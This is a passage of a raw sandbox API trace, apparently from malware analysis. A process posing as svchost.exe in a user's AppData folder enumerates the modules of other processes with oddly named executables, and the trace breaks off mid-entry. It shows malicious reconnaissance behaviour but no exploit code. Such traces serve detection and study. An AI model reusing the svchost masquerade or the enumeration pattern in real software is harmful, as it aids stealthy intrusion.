hModule=0x7fef64c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cscobj.dll") returned 0xa [0076.130] CoTaskMemFree (pv=0xd910e0) [0076.131] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.131] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef64c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll")) returned 0x1e [0076.137] CoTaskMemFree (pv=0xd910e0) [0076.137] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x2466a88, cb=0x18 | out: lpmodinfo=0x2466a88*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0076.142] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.142] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0076.148] CoTaskMemFree (pv=0xd910e0) [0076.148] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.148] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0076.154] CoTaskMemFree (pv=0xd910e0) [0076.154] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x2468c48, cb=0x18 | out: lpmodinfo=0x2468c48*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0076.160] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.160] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0076.166] CoTaskMemFree (pv=0xd910e0) [0076.166] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.166] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0076.172] CoTaskMemFree (pv=0xd910e0) [0076.172] CloseHandle (hObject=0x218) returned 1 [0076.187] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0076.187] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x218 [0076.187] EnumProcessModules (in: hProcess=0x218, lphModule=0x246d0a8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x246d0a8, lpcbNeeded=0x23ee40) returned 1 [0076.187] GetModuleInformation (in: hProcess=0x218, hModule=0x1190000, lpmodinfo=0x246d318, cb=0x18 | out: lpmodinfo=0x246d318*(lpBaseOfDll=0x1190000, SizeOfImage=0x17000, EntryPoint=0x11914a1)) returned 1 [0076.188] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.188] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1190000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0076.188] CoTaskMemFree (pv=0xd94a00) [0076.188] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.188] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1190000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Media Player\\yahoomessenger.exe" (normalized: "c:\\program files\\windows media player\\yahoomessenger.exe")) returned 0x38 [0076.189] CoTaskMemFree (pv=0xd94a00) [0076.189] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x246f558, cb=0x18 | out: lpmodinfo=0x246f558*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.190] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.190] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.190] CoTaskMemFree (pv=0xd94a00) [0076.190] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.190] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.191] CoTaskMemFree (pv=0xd94a00) [0076.191] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2471718, cb=0x18 | out: lpmodinfo=0x2471718*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0076.191] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.191] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0076.192] CoTaskMemFree (pv=0xd94a00) [0076.192] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.192] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0076.193] CoTaskMemFree (pv=0xd94a00) [0076.193] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24738d8, cb=0x18 | out: lpmodinfo=0x24738d8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0076.198] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.198] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0076.198] CoTaskMemFree (pv=0xd94a00) [0076.198] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.199] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0076.199] CoTaskMemFree (pv=0xd94a00) [0076.199] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2475ac0, cb=0x18 | out: lpmodinfo=0x2475ac0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0076.200] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.200] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0076.201] CoTaskMemFree (pv=0xd94a00) [0076.201] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.201] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0076.201] CoTaskMemFree (pv=0xd94a00) [0076.202] CloseHandle (hObject=0x218) returned 1 [0076.203] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0076.203] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb8) returned 0x218 [0076.203] EnumProcessModules (in: hProcess=0x218, lphModule=0x24781e0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24781e0, lpcbNeeded=0x23ee40) returned 1 [0076.204] GetModuleInformation (in: hProcess=0x218, hModule=0xd10000, lpmodinfo=0x2478450, cb=0x18 | out: lpmodinfo=0x2478450*(lpBaseOfDll=0xd10000, SizeOfImage=0x17000, EntryPoint=0xd114a1)) returned 1 [0076.204] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.204] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xd10000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="scriptftp.exe") returned 0xd [0076.204] CoTaskMemFree (pv=0xd94a00) [0076.205] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.205] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xd10000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files\\MSBuild\\scriptftp.exe" (normalized: "c:\\program files\\msbuild\\scriptftp.exe")) returned 0x26 [0076.205] CoTaskMemFree (pv=0xd94a00) [0076.205] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x247a660, cb=0x18 | out: lpmodinfo=0x247a660*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.206] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.206] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.206] CoTaskMemFree (pv=0xd94a00) [0076.206] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.206] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.207] CoTaskMemFree (pv=0xd94a00) [0076.207] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x247c820, cb=0x18 | out: lpmodinfo=0x247c820*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0076.207] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.207] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0076.208] CoTaskMemFree (pv=0xd94a00) [0076.208] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.208] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0076.210] CoTaskMemFree (pv=0xd94a00) [0076.210] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x247e9e0, cb=0x18 | out: lpmodinfo=0x247e9e0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0076.210] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.210] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0076.211] CoTaskMemFree (pv=0xd94a00) [0076.211] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.211] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0076.212] CoTaskMemFree (pv=0xd94a00) [0076.212] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2480bb0, cb=0x18 | out: lpmodinfo=0x2480bb0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0076.212] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.212] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0076.213] CoTaskMemFree (pv=0xd94a00) [0076.213] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.213] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0076.214] CoTaskMemFree (pv=0xd94a00) [0076.214] CloseHandle (hObject=0x218) returned 1 [0076.215] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0076.215] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x654) returned 0x218 [0076.215] EnumProcessModules (in: hProcess=0x218, lphModule=0x24832d0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24832d0, lpcbNeeded=0x23ee40) returned 1 [0076.216] GetModuleInformation (in: hProcess=0x218, hModule=0xda0000, lpmodinfo=0x2483540, cb=0x18 | out: lpmodinfo=0x2483540*(lpBaseOfDll=0xda0000, SizeOfImage=0x17000, EntryPoint=0xda14a1)) returned 1 [0076.216] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.216] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xda0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="winscp.exe") returned 0xa [0076.217] CoTaskMemFree (pv=0xd94a00) [0076.217] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.217] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xda0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\winscp.exe" (normalized: "c:\\program files (x86)\\windows media player\\winscp.exe")) returned 0x36 [0076.217] CoTaskMemFree (pv=0xd94a00) [0076.217] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2485768, cb=0x18 | out: lpmodinfo=0x2485768*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.218] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.218] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.218] CoTaskMemFree (pv=0xd94a00) [0076.219] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.219] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.219] CoTaskMemFree (pv=0xd94a00) [0076.219] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2487928, cb=0x18 | out: lpmodinfo=0x2487928*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0076.220] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.220] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0076.220] CoTaskMemFree (pv=0xd94a00) [0076.220] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.220] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0076.221] CoTaskMemFree (pv=0xd94a00) [0076.221] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2489b00, cb=0x18 | out: lpmodinfo=0x2489b00*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0076.221] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.222] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0076.222] CoTaskMemFree (pv=0xd94a00) [0076.222] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.222] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0076.223] CoTaskMemFree (pv=0xd94a00) [0076.223] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x248bcd0, cb=0x18 | out: lpmodinfo=0x248bcd0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0076.223] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.224] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0076.224] CoTaskMemFree (pv=0xd94a00) [0076.224] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.225] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0076.225] CoTaskMemFree (pv=0xd94a00) [0076.225] CloseHandle (hObject=0x218) returned 1 [0076.227] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0076.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa64) returned 0x218 [0076.227] EnumProcessModules (in: hProcess=0x218, lphModule=0x248e3f0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x248e3f0, lpcbNeeded=0x23ee40) returned 1 [0076.227] GetModuleInformation (in: hProcess=0x218, hModule=0xd50000, lpmodinfo=0x248e660, cb=0x18 | out: lpmodinfo=0x248e660*(lpBaseOfDll=0xd50000, SizeOfImage=0x17000, EntryPoint=0xd514a1)) returned 1 [0076.228] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.228] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xd50000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="baby.exe") returned 0x8 [0076.228] CoTaskMemFree (pv=0xd94a00) [0076.229] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.229] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xd50000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\baby.exe" (normalized: "c:\\program files\\internet explorer\\baby.exe")) returned 0x2b [0076.229] CoTaskMemFree (pv=0xd94a00) [0076.229] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2490870, cb=0x18 | out: lpmodinfo=0x2490870*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.230] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.230] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.230] CoTaskMemFree (pv=0xd94a00) [0076.231] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.231] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.231] CoTaskMemFree (pv=0xd94a00) [0076.231] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2492a30, cb=0x18 | out: lpmodinfo=0x2492a30*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0076.232] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.232] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0076.233] CoTaskMemFree (pv=0xd94a00) [0076.233] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.233] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0076.234] CoTaskMemFree (pv=0xd94a00) [0076.234] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2494bf0, cb=0x18 | out: lpmodinfo=0x2494bf0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0076.234] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.234] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0076.235] CoTaskMemFree (pv=0xd94a00) [0076.235] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.235] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0076.236] CoTaskMemFree (pv=0xd94a00) [0076.236] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2496dc0, cb=0x18 | out: lpmodinfo=0x2496dc0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0076.237] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.237] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0076.238] CoTaskMemFree (pv=0xd94a00) [0076.238] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.238] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0076.239] CoTaskMemFree (pv=0xd94a00) [0076.239] CloseHandle (hObject=0x218) returned 1 [0076.240] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0076.240] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x218 [0076.240] EnumProcessModules (in: hProcess=0x218, lphModule=0x24994e0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24994e0, lpcbNeeded=0x23ee40) returned 1 [0076.241] GetModuleInformation (in: hProcess=0x218, hModule=0x160000, lpmodinfo=0x2499750, cb=0x18 | out: lpmodinfo=0x2499750*(lpBaseOfDll=0x160000, SizeOfImage=0x17000, EntryPoint=0x1614a1)) returned 1 [0076.241] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.241] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x160000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="white_fine_pm.exe") returned 0x11 [0076.242] CoTaskMemFree (pv=0xd94a00) [0076.242] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.242] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x160000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Firefox\\white_fine_pm.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\white_fine_pm.exe")) returned 0x38 [0076.242] CoTaskMemFree (pv=0xd94a00) [0076.242] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x249b990, cb=0x18 | out: lpmodinfo=0x249b990*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.243] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.243] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.243] CoTaskMemFree (pv=0xd94a00) [0076.243] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.243] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.244] CoTaskMemFree (pv=0xd94a00) [0076.244] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x249db68, cb=0x18 | out: lpmodinfo=0x249db68*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0076.244] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.244] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0076.245] CoTaskMemFree (pv=0xd94a00) [0076.245] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.245] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0076.246] CoTaskMemFree (pv=0xd94a00) [0076.246] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x249fd28, cb=0x18 | out: lpmodinfo=0x249fd28*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0076.246] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.246] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0076.253] CoTaskMemFree (pv=0xd94a00) [0076.253] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.253] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0076.254] CoTaskMemFree (pv=0xd94a00) [0076.254] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24a1ef8, cb=0x18 | out: lpmodinfo=0x24a1ef8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0076.255] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.255] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0076.256] CoTaskMemFree (pv=0xd94a00) [0076.256] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.256] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0076.256] CoTaskMemFree (pv=0xd94a00) [0076.256] CloseHandle (hObject=0x218) returned 1 [0076.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c) returned 0x218 [0076.258] EnumProcessModules (in: hProcess=0x218, lphModule=0x24a4618, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24a4618, lpcbNeeded=0x23ee40) returned 1 [0076.259] GetModuleInformation (in: hProcess=0x218, hModule=0x340000, lpmodinfo=0x24a4888, cb=0x18 | out: lpmodinfo=0x24a4888*(lpBaseOfDll=0x340000, SizeOfImage=0x17000, EntryPoint=0x3414a1)) returned 1 [0076.259] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.259] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x340000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0076.259] 